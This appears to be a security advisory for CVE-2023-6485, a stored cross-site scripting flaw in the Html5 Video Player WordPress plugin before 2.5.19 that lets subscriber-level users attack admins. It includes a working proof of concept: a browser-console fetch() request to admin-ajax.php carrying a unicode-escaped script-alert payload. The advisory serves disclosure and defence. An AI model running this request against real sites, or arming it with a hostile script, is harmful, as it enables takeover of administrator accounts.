Html5 Video Player < 2.5.19 – Subscriber+ Stored XSS | CVE 2023-6485

Description

The plugin does not sanitise and escape some of its player settings, which combined with missing capability checks around the plugin could allow any authenticated users, such as low as subscribers to perform Stored Cross-Site Scripting attacks against high privilege users like admins

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user (id=14 being the ID of an existing video player from the plugin)

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type":"application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "action=h5vp_import_data&id=14&content={\"h5vp_total_views\":\"\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029\\u003b\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e\"}",
  "method": "POST",
}).then((response) => {return response.text();    }).then((data) => {console.log(data);})

The XSS will be triggered when an admin will view the player lists (ie https://example.com/wp-admin/edit.php?post_type=videoplayer)